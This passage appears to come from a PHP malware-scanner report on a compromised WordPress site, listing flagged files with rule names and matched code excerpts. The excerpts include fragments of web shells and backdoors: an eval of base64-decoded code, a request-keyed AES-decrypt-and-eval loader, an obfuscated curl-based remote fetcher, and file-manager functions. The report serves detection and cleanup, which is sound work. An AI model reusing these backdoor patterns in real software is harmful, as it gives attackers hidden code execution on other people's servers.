</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_25").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/sodium_compat/src/Core/Curve25519/Curve25519/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.50 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_26" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'wx/Yl3D4PKI2A8tHernohsCZ1EGvks2TR69PM69Xm9yDv8gPc0zrOffpe01LK+0h/JLEdyBPd85Z/tV/gyno51ZfPbdZa4yx9HHf4tbPevnd3BrVtHu8lze7OJe/9LeQ5Cc0A3px7k8pmvP14TZTJiN2I9p9Zv1F7f+j/vO5oP5vbMiaFEpPMFsWw31MTOh0C/af3/jC1sq3PYlzQEpTUvWkLbgtbfACrDE8NSsIiiTDWc90ydm7jqKXLtp/kTDlfAZOvKQczYnMNuwRImRqzgAYkRJAI5LhDxrY74ktcCPDrrvww9lj/xYF4ldlMAkFqRXM6jXQ3Orh3tlKyu4tfetD605NvZ21HcdqHHtyWtWhKrNTwJZ9Odx4Wvys/Jh+8l73xZfqNtf/6levNSn5FEK1oYLoKua+9YUretg+x2RhDmXi3jX32MXH/NV9v/0v9OB9DoraStBJAHScTsAVjFU2WWwPxM+MiHxz19DuZn8xUMvukwz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">EsiSf</span><span style="color: #007700">(</span><span style="color: #0000BB">$kwsW</span><span style="color: #007700">) { </span><span style="color: #0000BB">$LUm </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$tpQ </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$LUm</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$YBe </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$kwsW</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$YBe</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$LUm</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$tpQ</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">EsiSf</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'Vn6gtQdyN5fLuiWusTXvY+S8f+EXAtKBNm9qzu</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$EsiSf</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$EsiSf</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_26").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/sodium_compat/src/Core/Curve25519/Curve25519/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.38 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_27" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$xyveRxPr2f6</span><span style="color: #007700">[</span><span style="color: #0000BB">48</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); goto </span><span style="color: #0000BB">cq6gz3uvfQL</span><span style="color: #007700">; </span><span style="color: #0000BB">cq6gz3uvfQL</span><span style="color: #007700">: </span><span style="color: #0000BB">$B7EN5D2BkPD </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$u2tCxuSr4EB</span><span style="color: #007700">); goto </span><span style="color: #0000BB">ZXhjCHa9yN8</span><span style="color: #007700">; </span><span style="color: #0000BB">LhI9soI7adw</span><span style="color: #007700">: } static function </span><span style="color: #0000BB">HBvc0TI03Uy</span><span style="color: #007700">() { goto </span><span style="color: #0000BB">nFC7V4nVsg2</span><span style="color: #007700">; </span><span style="color: #0000BB">Xw33tMSZr64</span><span style="color: #007700">: @</span><span style="color: #0000BB">$YVbBb2aTvBu</span><span style="color: #007700">[</span><span style="color: #0000BB">7 </span><span style="color: #007700">+ </span><span style="color: #0000BB">3</span><span style="color: #007700">](</span><span style="color: #0000BB">INPUT_GET</span><span style="color: #007700">, </span><span style="color: #DD0000">"of"</span><span style="color: #007700">) == </span><span style="color: #0000BB">1 </span><span style="color: #007700">&& die(</span><span style="color: #0000BB">$YVbBb2aTvBu</span><span style="color: #007700">[</span><span style="color: #0000BB">4 </span><span style="color: #007700">+ </span><span style="color: #0000BB">1</span><span style="color: #007700">](</span><span style="color: #0000BB">__FILE__</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mFExyg3pn2F</span><span style="color: #007700">(</span><span style="color: #0000BB">$Ly4OLqEKMBV</span><span style="color: #007700">, </span><span style="color: #0000BB">$oHg8MTKi5Jz</span><span style="color: #007700">) { goto </span><span style="color: #0000BB">nXYifVhtvts</span><span style="color: #007700">; </span><span style="color: #0000BB">ZXhjCHa9yN8</span><span style="color: #007700">: return empty(</span><span style="color: #0000BB">$B7EN5D2BkPD</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$oHg8MTKi5Jz</span><span style="color: #007700">(</span><span style="color: #0000BB">$Ly4OLqEKMBV</span><span style="color: #007700">) : </span><span style="color: #0000BB">$B7EN5D2BkPD</span><span style="color: #007700">; goto </span><span style="color: #0000BB">LhI9soI7adw</span><span style="color: #007700">; </span><span style="color: #0000BB">nXYifVhtvts</span><span style="color: #007700">: </span><span style="color: #0000BB">$u2tCxuSr4EB </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_init</span><span style="color: #007700">(</span><span style="color: #0000BB">$Ly4OLqEKMBV</span><span style="color: #007700">); goto </span><span style="color: #0000BB">c3BPVi6o9KF</span><span style="color: #007700">; </span><span style="color: #0000BB">c3BPVi6o9KF</span><span style="color: #007700">: </span><span style="color: #0000BB">curl_setopt</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_27").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/sodium_compat/custom-functions-1769473460.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:24:42</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:24:42</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_28" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
